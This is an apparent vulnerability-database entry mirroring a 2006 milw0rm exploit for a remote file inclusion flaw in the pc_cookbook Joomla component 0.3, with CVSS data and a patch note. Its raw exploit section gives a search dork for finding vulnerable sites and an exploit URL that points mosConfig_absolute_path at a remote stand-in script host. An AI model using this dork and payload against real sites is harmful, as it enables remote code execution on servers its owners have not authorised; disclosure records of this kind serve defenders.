pc_cookbook Joomla Component

vendor:

pc_cookbook Component

by:

Matdhule

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: pc_cookbook Component

Affected Version From: 0.3

Affected Version To: 0.3

Patch Exists: YES

Related CWE: N/A

CPE: a:dianthos:pc_cookbook_component

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities

A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This can result in arbitrary remote code execution.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch immediately.

Source

Exploit-DB raw data:

---------------------------------------------------------------------------------
pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------

Author : Matdhule
Contact : matdhule@gmail.com
Application : pc_cookbook Component
Version : koyans 0.3
URL : http://www.dianthos.net & http://www.fisheye.gr/koyansblog

---------------------------------------------------------------------------------
Dork : allinurl:com_pccookbook

Exploit :
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://evilscript

---------------------------------------------------------------------------------

Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, & all crews #mardongan, #jambihackerlink @dalnet

# milw0rm.com [2006-07-17]